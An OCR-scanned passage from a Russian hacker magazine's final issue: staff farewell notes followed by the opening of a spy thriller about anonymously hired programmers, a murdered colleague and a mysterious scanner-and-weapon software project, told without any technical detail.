на тюнинг своего авто- 
мобиля, увлечься чре- 
воугодием и женской 
психологией (надеюсь, 
в практическом аспек- 
те данного термина? 
Ну, хорошо что хоть 

не женской физиологи- 
ей :) — прим. сами зна- 
ете кого). 


3 
Александр Киселев 
цветокорректор 


Все что имеет 

начало, имеет и свой 
логический конец! 

Вот и настал конец для 
журнала «Хакер 
СПЕЦ»! 

Ну что, думаю, 
похорон проводить не 
будем, а только ста- 
нем вспоминать хоро- 
шее, а его было нам- 
ного больше чем отри- 
цательного. 

Спи спокойно, 
наш «Хакер СПЕЦ»! 


7 

Сергей Никитин 
выпускающий 
редактор 


Придя в «СПЕЦ» три 
номера назад, я обна- 
ружил дружную и опыт- 
ную команду, которая 
уже давно делает жур- 
нал. Точнее, делала, 
так как этот номер — 
последний. По мере 
своих скромных сил и 
возможностей я ста- 
рался быть хорошим 
выпредом, который ко- 
ординирует всю работу 
редакции, проверяет 
все и в любой момент 


4 
Настя Глухова 
литературный редактор 


Самая «грамотная» в 
журнале =). Редактирую 
СПЕЦ с июня 2006, па- 
раллельно учусь в По- 
лиграфе и работаю в 
Центре современного 
искусства. Я в восторге 
от команды, делающей 
журнал — все очень 
энергичные, веселые и 
творческие люди. От- 
дельный респект авто- 
рам, особенно Крису 
Касперски: его «Поток 
сознания» — просто хит! 


может ответить на лю- 
бой вопрос по поводу 
процесса сдачи. Наде- 
юсь, что пять закончен- 
ных курсов журфака 
помогут мне хорошо 
делать «ИТ-Спец». 
Обещаю, что он 
будет выходить вовремя, 
не будет содержать оши- 
бок, а раздел по тести- 
рованию «железа» (ко- 
торый буду вести я) ста- 
нет самым лучшим и 
интересным в издании! 


5 
Андрей Каролик 
редактор 


В команде журнала 
«Хакер СПЕЦ» с 2003 
года, до этого успел 
написать более ста 
статей в «Хакер» и 
«Хакер СПЕЦ», так что 
прекрасно знает все 
потенциальные пробле- 
мы, которые могут воз- 
никнуть у авторов во 
время подготовки ма- 
териала. Любит свою 
работу прежде всего 
из-за возможности об- 
щаться с людьми, с ко- 


Иван Васин & 
Наталья Жукова 
арт-команда 


Вот и закончился мара- 
фон, который мы стар- 
товали немногим более 
года назад. Всего 15 
журналов и всего 15 
месяцев с того момен- 
та, как нас пригласили 
в «СПЕЦ». Нам кажет- 
ся, что журнал вырос, 
выросли и мы. Что-то 
успели сделать за этот 
период, что-то нет. Ко- 
нечно, хотелось сде- 
лать намного больше. 
Теперь же наступил тот 


торыми знакомится в 
процессе поиска новых 
авторов и экспертов. 
Считает, что нет ниче- 
го невозможного, прос- 
то все в итоге упирает- 
ся в ресурсы. Больше 
всего не любит непро- 
фессионализм в рабо- 
те. Ценит надежность и 
своевременность. Хоб- 
би — беговые ролико- 
вые коньки, капитан 
команды Force Team 
(www.forceteam.ru). 


этап, когда «СПЕЦ» 
должен ступить на но- 
вый уровень. Для нас 
же это подходящий мо- 
мент покинуть журнал, и 
дать возможность кому- 
то еще вдохнуть в него 
новый смысл, новую 
жизнь, новую дущу... 
Хотим пожелать 
действующей команде 
профессионального и 
творческого роста, а 
нашей смене — непо- 
колебимой выдержки! 


ОФФТОПИК 


ПУЛЯ ДЛЯ ГЕНИЯ 


НА ЛУКОВНИКОВА ПОГОНЫ ГЕНЕРАЛА ВСЕГДА 
ПРОИЗВОДИЛИ СИЛЬНОЕ ВПЕЧАТЛЕНИЕ. 


Они его практически гипнотизировали — настолько манящим был их 
блеск, столько неизведанного и недоступного таили они за собой, что 
глаза оторвать от них было практически невозможно. 

Он стоял навытяжку перед генеральским столом из красного де- 
рева, поедал глазами то погоны, то портреты президента и министра 
обороны над головой и ждал очередного выговора с невообразимой 
преданностью. 

— Ну что, Чипполино, — сквозь зубы процедил генерал. — Результат 
будет еще при моей жизни — или уже потом? 

Луковников (в миру генералитета Чипполино) шмыгнул носом 
совсем не по уставу и кивнул: 

— Будет. При вашей. Скоро, товарищ генерал-лейтенант. Сроки еще 
не вышли... 

— Но уже подходят, — генерал встал, прошелся вдоль стены под порт- 
ретами своих руководителей и начальников. — Подходят. И сейчас не 
времена коммунистической партии — когда можно было лозунгами 
сорить годами и так ничего и не сделать... 

— Так точно, товарищ генерал-лейтенант, — Луковников теребил KOH- 
чиками пальцев штанины, стараясь делать это так, чтобы командую- 
щий не замечал. — У меня... У моей группы есть еще две недели... То 
есть три, но вы приказали сократить... 

— Приказал! — крикнул генерал. — И снова прикажу! Результат мне на 
стол через четырнадцать дней! Ускорьте процесс любыми средствами! 

Он остановился в дальнем углу кабинета, посмотрел куда-то 
в сторону и произнес: 

— Цель оправдывает средства. Вы меня поняли? 

Луковников замер и даже прекратил издеваться над форменны- 
ми брюками. Генерал посмотрел на него тяжелым взглядом из-под 
брежневских бровей: 

— Не слышу... 

— Так точно, понял! — козырнул Луковников. 

— К пустой голове руку не прикладывают, — поморщился генерал, и Лу- 
ковников вспомнил, что оставил фуражку у адъютанта за дверью. — Чип- 
полино... Кто там в разработке? Фамилия у одного запоминающаяся... 
— Алмазов, товарищ генерал-лейтенант, — напомнил Луковников. — 
И Рыков. 

— Кто из них приоритетнее? 

— В настоящий момент ценность Алмазова не вызывает сомнений... 
— Луковников понял, что беседа перешла в более спокойное русло. — 
Задания получены, деньги... 

— Списал уже? Смотри, узнаю, что гараж строишь на казенные — рас- 
стреляю. 

— Отчитаюсь за каждый рубль, — обиженным тоном ответил Луковни- 
ков. — Вы же меня знаете. 


— Потому и напоминаю, — генерал закурил, выпустил облако дыма 
в сторону. — Координатор толковый? 

Луковников пожал плечами. 

— Да вроде нормальный. Но от него мало чего зависит... Главное — 
что сделают Алмазов и его напарник. 

— Фигурантов уже чем-нибудь зацепили? 

— Да. Но с Рыковым сложнее... — Луковников покачал головой. — 
С ним придется общаться очень жестко. 

— Так общайтесь, — генерал сделал еще пару затяжек, затушил не 
выкуренную и до половины сигарету, сокрушенно вздохнул. — Врачи 
запрещают. А порой хочется — аж до слез... Ты мне дай результат! 

И не смотри на мои погоны. Сделаешь работу — представлю на пол- 
ковника. А там уже сам крутись, как умеешь. 

Луковников прищелкнул каблуками, вытянулся в струну и едва 
ли не крикнул: 

— Разрешите выполнять? 

Генерал махнул рукой: 
— Валяй... 

Будущий полковник вышел из кабинета, прикрыл дверь и вытер 
пот со лба. Адъютант смотрел на него с плохо скрываемой усмешкой. 
— Крут батя сегодня? — спросил он у Луковникова. 

— Да уж... — кивнул тот в ответ. — Но и мы не лыком шиты. 

Он Hagen фуражку, выровнял ee, поправил ремень и вышел из 

приемной. 


ххх 


Ждать надо было еще примерно полчаса. Лукин пощелкал кнопками 
пульта, пробежался глазами по новостям, какому-то фильму, сме- 
нил все это на биатлон, но наши дамы с винтовками тащились в кон- 
це основной группы, не претендуя ни на какие медали, в результате 
чего через несколько минут он оказался уже на музыкальном кана- 
ле, коих в последнее время что-то уж очень много развелось — кли- 
пы были довольно приличными, музыка цепляла, фигуристые дев- 
чонки садились на шпагат, парни с наколками бредили неким подо- 
бием рэпа, Лукин бросил пульт на диван и решил оставить это зву- 
ковое сопровождение. 
— Будем надеяться, что люди они пунктуальные и не пересекутся у ме- 
ня под дверьми, — покачивая головой в такт музыке, сказал он в теле- 
визор. — Хотя никак не возьму в толк — что в этом плохого? Ну, уви- 
дит один другого — что это изменит? Правда, минимум информации 
— максимум защищенности, так, кажется, говорил заказчик? Слиш- 
ком сложная для понимания фраза... 

Он встал, вернулся за компьютер и перечитал последнее письмо, 
пришедшее вчера вечером: 
— «Утром ждите Рыкова в десять часов. Гонорар передадите сразу. 
Алмазов придет через сорок минут. Ему вы ничего не должны, с HAM 
рассчитались уже давно и совершенно другим способом. Когда приме- 
те исходники, обращайтесь к инструктору. ICQ 444115686. Он все вре- 


мя онлайн, ждет вас. Суть дела он изложит. Остальное — за вами. Срок — 
четыре дня». Как всегда, без подписи... 

Кресло скрипнуло под ним — жалобно и как-то разочарованно, словно 
от наличия подписи в письме зависело его существование. Лукин крутнулся 
туда-сюда, не сводя глаз с экрана. 

— Осталось восемнадцать минут... Придет Рыков... Что за Рыков? Как я уз- 
Hato, что он — это он? Паспорт попросить? Или он скажет: «Здрасьте, я Ры- 
ков, меня тут все знают». Гонорар этот еще... 

Конверт с деньгами оказался у него в квартире совершенно неожидан- 
но, по образу и подобию Игоря Кио. Просто лежал посреди коридора, когда 
Лукин десять дней назад пришел с работы. Внутри — две тысячи сто долла- 
ров и записка. «Ваши услуги в очередной раз очень понадобились одной 
влиятельной организации... На деньги не обращайте внимания... Они приго- 
дятся в дальнейшем... Сто долларов — за беспокойство и чтобы сменить за- 
мок в двери, если вы чего-то боитесь... Когда придет человек по фамилии 
Рыков — отдадите ему конверт с деньгами в обмен на диск. Еще один диск 
вам передаст человек, который представится Алмазовым... Как только на 
руках у вас окажется информация — с вами свяжутся и поставят задачу, ко- 
торая будет оплачена более чем... Мы будем очень вам благодарны за сот- 
рудничество... Ваши друзья». 

Замок он не поменял. Решил, что раз они вошли сюда так свободно — 
то что меняй, что не меняй, одно разорение. Вроде ничего не взяли... Деньги 
он спрятал в шкаф, переложив причитающуюся ему сотню в карман пиджа- 


ка — она сумела на несколько дней поправить его пошатнувшееся финансо- 
вое положение. И все оставшееся до прихода гостей время думал о том, что 
же такого он должен будет сделать и сколько это что-то будет стоить... 

Конечно, он понимал, что никто не попросит его сделать евроремонт 
или перебрать двигатель «Бентли». Он ничего не соображал ни в первом, ни 
во втором. Но вот какие услуги может оказать программист, уволенный из 
серьезной конторы, занимающейся обеспечением безопасности — причем 
уволенный по очень и очень веской причине... Тут ошибки быть не могло. Он 
уже выполнял такие анонимные задания несколько раз за последние три го- 
да. И каждый раз гонорар был более чем высск, а Te, кто использовал его, 
по-прежнему оставались в тени. 

Он понимал, что люди его типа — не обязательно программисты, а во- 
обще, люди, хорошо умеющие делать свою работу — быстро оказываются 
в поле зрения «влиятельных организаций», как только их услуги перестают 
быть нужными родному государству. Ушел он из конторы четыре года назад. 
Ушел с шумом. С трудом получил расчет — хотя грозили вместо денег пулю 
в лоб... Конечно, они были правы. Абсолютно. Он нарушил закон. Продал ис- 
ходный код очень секретного продукта. Просто они не знали, что Лукин полу- 
чил за это деньги — удалось обставить это как свою халатность, но без прес- 
тупного умысла. Ущерб был велик — никто даже не пытался подсчитать. Кто 
его вычислил, Лукин не знал и по сей день — но всегда понимал, что работа- 
ет среди людей, которые ничуть не глупее его. Кто сумел отследить, понять, 
предугадать, вычислить... Но он успел передать код. Успел получить гоно- 
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рар. Набрал кредитов, купил плазменный телевизор, мощный компью- 
тер, немного мебели — и когда остался без денег, его уволили. 

Каким-то образом он продержался несколько месяцев. Выруча- 
ли друзья, один раз с кредитом помог отец, но пенсия была невели- 
ка, чтобы рассчитывать на нее еще раз в ближайшие полгода. Пы- 
тался устроиться на работу — и везде его ожидали отказы. Пресло- 
вутый «черный список». Он действовал замечательно, фамилия «Лу- 
кин» отпугивала всех, на дверь указывали с завидным постоянством. 
Он даже пытался начать пить — настолько зацепила его эта жизнен- 
ная пустота; но и тут не вышло. Печень, слабая с детства, не позво- 
лила превратиться в алкоголика — и трехдневный запой стал пер- 
вым и последним в его жизни. 

И вот когда он уже совсем потерял всякую надежду и принялся 
обходить ближайшие автостоянки в надежде превратиться в сторожа 
с высшим образованием — в его квартире оказался конверт с деньга- 
ми и предложением поработать на кого-то. Потом он находил такие 
конверты еще три раза... 

Лукин прошелся по квартире, наводя порядок, раскладывая книги, 
газеты, по пути вытряхнул пепельницу в старую газету, оглядел все оце- 
нивающим взглядом, смял в руке кулек с пеплом и направился на кухню. 

Когда он проходил по коридору мимо двери, раздался стук в дверь. 

Лукин замер и медленно повернулся на звук. Его удивило то, что 
гость постучался — звонок работал исправно, претензий к нему не бы- 
ло уже много лет. Сделав пару шагов к двери, он успел передумать ты- 
сячу вариантов встречи с первым гостем, но вдруг вспомнил, что ров- 
но без пяти десять должен был сработать будильник — но тот мол- 
чал... Значит, Рыков пришел раньше. 

Этот случай они с заказчиком не обговаривали. Правда, ничего 
странного и опасного в этом не было — подумаешь, переволновался, 
не сумел распланировать время, пришел и не стал мяться под дверью, 
глядя на часы, а сразу стукнул — нетерпеливо, настойчиво. Лукин, 
продолжая сжимать в руку кулек, пахнущий табаком и дымом, подо- 
шел к двери и щелкнул замком. 

Ему показалось, что дверь открылась сама. Похоже, человек на 
площадке ждал звука щеколды — створка сразу пошла вперед, Лукин 
увидел человека в джинсовом костюме. Руки гость держал за спиной, 
глаза пристально смотрели на хозяина. 

— Вы Рыков? — спросил Лукин, открыв дверь настолько, чтобы 
впустить гостя. 

В ответ человек вытащил из-за спины пистолет и дважды выст- 
релил хозяину в грудь... 

Лукин, отброшенный пулями на противоположную стену коридора, 
медленно сползал на пол, пытаясь сопротивляться силе тяжести, и рвал- 
ся вверх слабеющими руками и ногами. Рубашка набухала кровью, он 
тяжело и шумно дышал, глаза шарили вокруг себя, ничего не видя и не 
замечая, как стрелок вошел внутрь, огляделся по сторонам, пнул в сто- 
рону раскрывшийся кулек с окурками и тихо затворил за собой дверь. 

— Что... Кто?.. — пытался задать вопрос Лукин, но силы покидали его. 
Человек нагнулся над умирающим, словно пытаясь услышать последние 
слова, потом выпрямился, прошел по комнатам, чтобы убедиться, что 
больше никого нет. Когда он вернулся в коридор, Лукин уже был мертв. 

Киллер достал из кармана телефон, сделал звонок. 

— Исполнено. Какие будут дальнейшие указания? 

Трубка проинструктировала его на предмет дальнейших действий. 
— Понял... Дверь не закрываю... — киллер закончил разговор и вы- 
шел, оставив входную дверь немного приоткрытой. Когда через пят- 
надцать минут сюда примчался опоздавший из-за толчеи в метро Ры- 
ков, запах пороха с площадки практически выветрился... 
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Читая с экрана, он отчетливо шевелил губами, произнося почти все 
шепотом: 

— «...ждите Рыкова в десять часов. Гонорар передадите сразу. Алма- 
зов придет через сорок минут.... Когда примете исходники, обращай- 
тесь к инструктору. ICQ 444115686... Суть дела он изложит. Срок — 
четыре дня...». 

Когда Рыков перечитал письмо в четвертый или пятый раз, то по- 
чувствовал, что покрылся липким и холодным потом. Он понятия не 
имел, как так случилось, что вот он здесь — а в коридоре лежит мерт- 
вец, обои измазаны кровью, на столе перед ним диск с программой, на 
экране компьютера письмо от неизвестного заказчика и совершенно 
неизвестно, что еще случится в его жизни в ближайшие пять минут. 

Когда он забежал на шестой этаж, где должна была быть кварти- 
ра Лукина, то ему показалось, что сверху тянет каким-то дымком, на- 


поминающим запах сгоревшего фейерверка. Правда, ощущение было 
мимолетным, буквально на долю секунды, и Рыкова оно не останови- 
ло — ноедва он потянул на себя приоткрытую дверь после нескольких 
безответных звонков, как все сразу стало понятно... 

Хозяин квартиры не мог открыть ему дверь. Он был мертв. Со- 
вершенно и необратимо. 

Не то чтобы Рыков часто видел мертвецов — но вот почему-то 
здесь и сейчас он не испугался. Постоял на пороге, потом воровато ог- 
лянулся — не увидел ли кто, как он входит, скользнул взглядом по 
дверным глазкам, сделал шаг вперед и притворил дверь. Лукин смот- 
рел невидящими глазами куда-то в потолок, голова склонена к пле- 
чу... На рубашке отчетливо выделялись два пулевых ранения — кровь 
темная, рубашка пропиталась ей настолько, что казалась каким-то 
панцирем. На обоях — там, где он сползал — несколько мазков кисти 
полупьяного художника, кровавые следы, алый отпечаток ладони и 
большая дырка в стене. 

— Навылет, — тихо сказал Рыков и вдруг понял, что находится один на 
один с мертвецом. И сейчас просто звездный часу тех, кто когда-ни- 
будь в жизни хотел его подставить. Зайди сюда в эту минуту любой че- 
ловек — и не отмоешься очень и очень долго... 

Развернувшись, он уже хотел уйти, и чем быстрее, тем лучше, но 
в какой-то момент ему вдруг стало жалко той работы, что оказалась 
никому не нужной. Он потратил две недели своей жизни на решение 
проблемы — а человек, которому он нес диск, был не в состоянии оце- 
нить его труд. И тогда он решил хотя бы узнать, с кем имеет — точнее, 
имел дело — и прошел в комнату. 

Включенный компьютер сразу бросился ему в глаза — как чело- 
веку, обитающему в основном за клавиатурой. На экране был открыт 
почтовик. Рыков подошел поближе и увидел письмо, адресованное 
убитому (за неимением в этой комнате никого другого). Прочитал, пос- 
мотрел на часы: 

— Я опоздал... — хмуро сказал он. — Хотя — черт его знает, что было, 
приди я вовремя. Значит так — ключевые слова «гонорар» и «Алма- 
зов». Мертвец должен был передать мне деньги и встретиться еще 

с одним человеком. Времени у меня мало. 

Он оперся руками на компьютерный стол и задумался... 

Две недели назад к нему пришли гости. Два человека, выглядев- 
ших настолько серо и безлико, что после их ухода он не мог вспомнить 
их лиц. Пришли, не представились, долго отмалчивались в креслах, 
переглядываясь между собой — а потом предложили работу. Причем 
работа была настолько сложной и запутанной — не по сути, а по тому 
количеству тумана, который они напустили вокруг да около, — что Ры- 
ков поначалу засомневался во вменяемости этой парочки, напомнив- 
шей ему лучшие годы, отданные пионерской организации и игре «Зар- 
ница». Они постоянно уводили взгляды в сторону, играли в каких-то 
агентов, путали термины, свои собственные вычурные и явно ненасто- 
ящие имена, почесывались, подкашливали, кусали губы — в общем, 
производили впечатление жутких непрофессионалов. Но это было 
только первое впечатление. Оно же — обманчивое. 

Потому что когда они ушли — Рыков держал в руках пятьсот дол- 
ларов и имел за душой обещание написать программу. Написать неч- 
то совершенно непонятное, на первый взгляд глупое, нелепое и ненуж- 
ное. Но чем больше он думал над тем, как его ловко и незаметно под- 
вели к цели — тем больше приходил к мысли о всесилии той организа- 
ции, что прислала ему своих агентов. Вот только понять, что же от него 
хотели, он смог лишь на третий день — когда изучил те наработки, что 
были предложены ему в качестве образцов. 

Он должен был создать сканер. И вроде бы — ну что в этом 
сложного? Сканером больше, сканером меньше — в интернете их 
пруд пруди. Но что-то тут было не так... 

Рыков смотрел на то, что у него получается, и пожимал плечами 
— ему явно не сказали всей правды, не поставили стопроцентно по- 
нятное условие. Его использовали «в темную». Потому что у этого ска- 
нера явно чего-то не хватало. 

Рыков абсолютно отчетливо видел те точки соприкосновения, ко- 
торые вели — должны были вести — в никуда. Куда-то к другой прог- 
рамме, которую прилепят к его сканеру — и черт его знает, что из это- 
го получится. «Великолепная колхозная сноповязалка», — как сказал 
Остап Бендер, глядя на «Антилопу Гну» Адама Козлевича... 

— И ведь я написал, — тихо произнес Рыков, глядя на мертвеца в ко- 
ридоре. — Написал этот проклятый сканер — совершенно не пони- 
мая ряда процедур, которые прикрутил к нему по заказу той парочки. 
Надеюсь, некто Алмазов, с которым уже расплатились, расскажет 
мне, что же написал он. 


Рыков был уверен: он и его неизвестный напарник писали по ку- 
сочкам какую-то очень криминальную вещь. Будучи человеком логи- 
чески мыслящим, он прекрасно понял, что для конспирации нет ничего 
лучше подобной ситуации. Все это было описано еще Жюль Верном 
в его книгах о «Наутилусе» — капитан Немо строил свою лодку на раз- 
ных заводах мира по частям, ни один инженер не имел представления 
о том, что должно получиться. Так и в случае с ними — куски програм- 
мы должен свести воедино тот, чья кровь сейчас была размазана на 
стене в коридоре. Но он унес тайну с собой... 

Рыков немного постоял в дверях, а потом преодолел легкую 
брезгливость и страх, подошел к убитому и осмотрел его пропитанную 
кровью одежду. В карманах рубашки ничего не было — и это было 
здорово, потому что одна пуля пробила левый карман, там, где серд- 
це; вряд ли конверт с деньгами уцелел бы в такой передряге. 

Кулек с окурками явно не был похож на источник денег; Рыков 
отпихнул его подальше, потом пошарил в карманах брюк. Пусто. Оста- 
валось искать по всей квартире. 

Он сделал несколько шагов по коридору, когда сзади раздался 
легкий шум. Рыков замер; сердце застучало, словно пулемет. Вмиг по- 
холодев, он медленно обернулся — и увидел, как труп хозяина, потре- 
воженный во время обыска, заваливается набок. Мертвец ткнулся 
лбом в стойку для обуви и замер — дальше ему уже падать было неку- 
да. Рыков попытался проглотить комок слюны — сразу не получилось, 
во рту было ужас как сухо. Из горла вырвался сначала тихий стон, по- 
том несколько крепких, но таких же тихих матюгов. 

— Так же можно седым остаться, — проскрипел он зубами, прислу- 
шался и продолжил поиски своего гонорара. — Надо бы побыстрее — 
через пять минут придет мой коллега... 

Он тщательно обыскал комнату — и когда в дверь постучали, 
конверт с гонораром лежал уже у него в кармане. 

Прятать деньги мертвый хозяин явно не умел... 
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Они удобно расположились в креслах друг напротив друга. Рыков вни- 
мательно рассматривал своего нового коллегу по программерскому 
цеху, который, несмотря на быструю адаптацию к происходящему, 
время от времени косился в сторону коридора, где лежал мертвый хо- 
зяин квартиры. 

Рыков, к тому времени нашедший в шкафу и свой гонорар, и до- 
кументы убитого, уже знал, что грудь прострелили гражданину Лукину 
Сергею Дмитриевичу, имеющему диплом о высшем образовании, ко- 
торым можно было, останься он в живых, гордиться еще очень и очень 
долго. В голове кое-что потихоньку прояснялось... 

И вот теперь он пристально разглядывал Алмазова, не торопясь 
задавать ему вопросы. Перед собой он видел человека средних лет, 
держащегося достаточно уверенно, но с некоторой долей растерян- 
ности. Труп в коридоре значительно поднял уровень адреналина в его 
крови, он с огромным трудом преодолел в себе неприязнь, страх и не- 
верие и вошел в комнату. В отличие от Рыкова, пришел он вовремя, 
вежливо стоял на площадке возле открытой двери в ожидании хозяи- 
на и не торопился представляться. Рыков уже грешил на то, что суще- 
ствовал какой-то пароль, который Лукин унес с собой в могилу — но 
Алмазов, напоминая профессора Плейшнера, назвался после некото- 
рых раздумий, зачем-то похлопал себя по карману куртки и пересту- 
пил порог. 

Убитого он увидел сразу и как-то непроизвольно рванулся назад, 
но Рыков его удержал за рукав. Они изобразили какие-то трепыхания, 
похожие на борьбу двух рахитиков — Рыков не особо старался удер- 
жать, а Алмазов, похоже, просто собирался упасть в обморок от уви- 
денного и особого сопротивления не оказывал. В итоге они оказались 
там, где и сидели уже молча минут десять — Рыков только вставал на 
несколько секунд, вспомнив, что входную дверь они так и оставили 
открытой. Пришлось закрыть замок, чтобы оградить себя от вторже- 
ния посторонних. Алмазов настороженно постукивал пальцами по под- 
локотнику и все время что-то проверял в кармане. 

— Будем знакомиться? — не удержался Рыков. Алмазов посмотрел на 
него, потом еще раз в коридор испросил: 

— Может, его накрыть чем-нибудь? 

— Согласен, — Рыков в очередной раз встал, прошел в прихожую и, 
сняв с вешалки плащ, накинул на Лукина. — Устроит? — спросил он, 
не отходя от мертвеца. 

Алмазов кивнул и сказал: 

— Меня Андрей зовут. Андрей Алмазов. 
— Антон Рыков. А это был человек, к которому мы несли свои прог- 


раммы, — он поправил плащ и 
вернулся в комнату. — Я на- 
шел документы... Лукин, прог- 
раммист. Пока все. 

Алмазов попробовал на 
вкус фамилию убитого, отри- 
цательно покачал головой: 

— Никогда не сталкивался. 

— Вы знаете, кто нанимал вас? 
— Двое... — Алмазов пожал 
плечами. — Какие-то странные. 
— Описать сможете? 

— Да они... Незапоминающи- 
еся. Серые. 

— Точно... — кивнул Рыков. 
— Те же, что и ко мне прихо- 
дили. Я тоже никого не запом- 
нил. Деньги давали? 

— А вам-то что? 

— Просто в письме было написано, что мне заплатят сегодня, а с вами 
уже рассчитались — заранее. Мне даже как-то обидно стало — не 

в смысле денег, а в отношении того, что вам заплатили вперед. Полу- 
чается, что вам доверяли — а мне нет... 

Рыков пожал плечами и вопросительно посмотрел на Алмазова, 
ожидая ответа или какого-нибудь комментария. 

— Уменя — обстоятельства... — Алмазов виновато посмотрел Ha Ры- 
кова. — Семейные. Высшее образование. У дочери. Надо было пла- 
тить, и срочно. Я не мог ждать. 

— И вам поверили? — Рыков удивленно поднял брови. — Воттак вот 
— взяли и поверили на слово? 

Алмазов развел руками: 

— Не то чтобы поверили. Денег дали. Сразу. Это, знаете, как в «Ера- 
лаше» было когда-то — бразильская система. Если что не так — моя 
дочь под прицелом. Сначала она, а потом уже я. 

Рыков прикусил губу и вдруг почувствовал, в какое дерьмо он 
вляпался. Те двое, что играли с ним в дурачков, выставили Алмазову 
недвусмысленный ультиматум. Слава богу, у него самого возмож- 
ность шантажа исключалась — детьми не обзавелся, родители умерли 
давно... Близких людей, за жизнь которых он бы переживал, в настоя- 
щий момент у Рыкова не было. 

— Скажите, — выдержав паузу, спросил он, — как вы считаете, нам 
стоит продолжать игру? 

— Какую игру? — Алмазов удивленно поднял брови. — Я не вижу 
здесь никакой игры. Все предельно реально. Нам дали задание — вам 
и мне. Мы оба — вы, надеюсь, тоже — его выполнили и принесли все 
по назначению. Человека, который отвечал за то, чтобы принять у нас 
работу, убили. И вы считаете, что с нами кто-то играет? Тогда как наз- 
вать эту игру? «Кошки-мышки»? «Прятки»? 

— Скорее, «Казаки-разбойники», — буркнул Рыков. — Да уж, вы пра- 
вы. И все-таки — раз уж мы здесь, может, стоит выйти на связь с чело- 
веком, указанным в последнем письме? 

— С какой целью? — Алмазов промокнул платком влажную шею. — 
Призовая игра? Если здесь все очень и очень серьезно — боюсь, с на- 
ми никто не захочет иметь дела. Наверняка там есть пароли для связи, 
некие условности, которые нам не преодолеть. Поставьте себя на мес- 
то того, кто назван «инструктором». Вы бы поверили первому, кто пос- 
тучался к вам через Сеть? 

Рыков отрицательно покачал головой. В голове он уже прокру- 
тил пару диалогов с этим «инструктором», но вот насчет паролей — 
тут было глухо... 

— Скажите, а что... То есть — какое задание было дано вам? — поин- 
тересовался Рыков спустя некоторое время. Слишком тягостным было 
сидение в этой комнате в полной тишине — каждый из них думал 

о том, что же все-таки может случиться дальше... 

— Модуль, — отозвался Алмазов, уже безо всяких эмоций разгляды- 
вая труп Лукина в коридоре. — Модуль снайперской стрельбы — это 

я его так назвал. На самом деле это должно было быть нечто большее. 
Расширяемое, так сказать. Если ко всему этому прикрутить кое-какие 
условия, то... В общем, можно стрелять из чего угодно и куда угодно. 
Со снайперской точностью. 

Рыков молчал. Дар речи куда-то подевался. Напрочь. Ведь если 
они должны были сделать части одного целого — то на кой хрен сдался 
его сканер портов, пусть и очень хитрый, со своей изюминкой, если его 
напарник по «черному делу» создал такую мощную военную игрушку? 
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Алмазов тем временем вздохнул, снова похлопал себя по карма- 
ну и вытащил оттуда диск. 
— Вот, — показал он Рыкову. — Модуль... 

Тот сумел только кивнуть в ответ... 
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— Вы отдаете себе отчет в происходящем? — генерал говорил медлен- 
но, взвешивая каждое слово. — Вы понимаете, в какую пропасть пока- 
тимся все мы, если ваши рассуждения о смысле жизни и психологизме 
ситуации окажутся не более чем рассуждениями над трупом? Этакой 
заупокойной службой — над вашим и моим расстрелянными телами? 

Луковников, как и всегда стоял навытяжку, глядя выпученны- 
ми глазами куда-то в стену. Генерал прищурился и постучал кон- 
чиками пальцев по столу. Подполковник не подал и вида, что слы- 
шит какой-то звук. 
— Вы понимаете, что это даже не самоуправство? 

Луковников молчал. Ставки были сделаны. Обратного хода нет. 
— Когда я говорил «хрен с ним», я... Мне даже в голову... 

Генерал сел в кресло и обхватил голову руками. 
— Чипполино, сука... — он не мог ничего сказать, кроме двух этих 
слов, в которых вместе собрались и ненависть к идиоту-подполковни- 
ку, занимающемуся какими-то закулисными играми, и страх за свою 
жизнь, и безысходность. — Что ж ты так со мной... 

Луковников спокойно проглотил и кличку, и «суку», после чего 
безо всякой команды стал «вольно» и спросил: 
— Вы в состоянии меня выслушать, товарищ генерал-лейтенант? Я го- 
тов привести несколько аргументов в пользу того, что моя схема... 
мой план... что все сработает. 

Генерал поднял на него невидящий взгляд и спросил: 
— Кто застрелил Лукина? 

Подполковник вздохнул и ответил: 
— Я. 
— Тоесть? — командующий напрягся и впился глазами, внезапно об- 
ретшими зрение, в подчиненного. — Ты? Ты, Песталоцци? 
— Чипполино, — машинально поправил Луковников. — Хотя, если 
угодно... Дело в том, что нам нужно от этой парочки только одно — ре- 
зультат. Я же не своими руками... 
— Я понимаю, — генерал как-то беспомощно массировал пальцы и 
постоянно хотел взять со стола зажигалку, но отдергивал от нее руки, 
словно она была раскаленной. — Результат и еще раз результат... Лу- 
кин был лучшим, понимаешь... Он выполнил за последние три года 
несколько заданий. Он был гений, ты это понимаешь, сволочь ты та- 
кая... И теперь он убит. 

Командующий встал, обошел стол и приблизился к Луковникову. 
Тот автоматически напряг тело, вытянувшись в струну. Стоять «воль- 
но» ему почему-то внезапно расхотелось. 
— Я готов выслушать твои бредни, подполковник, — сухо кивнул гене- 
рал, едва не задев Луковникова. — И даже выслушаю их, не проронив 
ни слова. Но если меня не устроит твоя версия событий — пойдешь 
под танк. Перемелется — костей не найдут. Вместе с Лукиным похоро- 
ню, у вас даже фамилии почти одинаковые, сойдешь за опечатку в по- 

хоронном листе, скотина, если что не 


так. Так что не рассчитывай в случае 
провала отделаться звездой на погонах. 


Лишишься задницы. И головы. Одновре- 
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Луковников выслушал все это и 
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огонь и смотрел на собеседника через язычок пламени. — Теперь точ- 
но нет. Ты не Чипполино — ты Дантес. Ты... 

— Слушайте дальше, товарищ генерал-лейтенант. Насчет гения у ме- 
ня немного другое мнение... 
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На самом деле Алмазов погрешил против истины, хвастаясь перед 
Рыковым своей работой. Не так уж много труда было вложено в то, 
что он держал сейчас в руках. Когда-то, года три назад, он работал 

в одном секретном конструкторском бюро полувоенного образца. Ра- 
ботал самым обыкновенным инженером и случайно был выдвинут ру- 
ководством в число тех, кого отправили на учебу — осваивать совре- 
менные информационные технологии в сфере производства. Роль 
случая была в его жизни на тот момент крайне велика — и ктому, что 
он оказался в числе пяти кандидатов, выбранных на эту роль, тоже 
приложило руку провидение. 

Курсы были интересными, продуктивными, работали они с ли- 
цензионными программами — был и американский софт, и английс- 
кий, и местами наш, отечественный. И все с какой-то хитрой направ- 
ленностью — у Алмазова быстро сложилось впечатление, что еще 
немного, и они тут спроектируют по меньшей мере атомную бомбу. 
Его коллеги по программерско-инженерному цеху тоже проявили не- 
дюжинную прыть в освоении материала, но, как оказалось, свято ве- 
рили в абсолютно гражданскую направленность курсов — в результа- 
те чего благополучно по их окончании вернулись в родные стены про- 
должать начатое дело. 

Алмазова же сразу после экзамена, на котором он блестяще 
справился со всеми заданиями, отозвали в какой-то кабинет, едва ли 
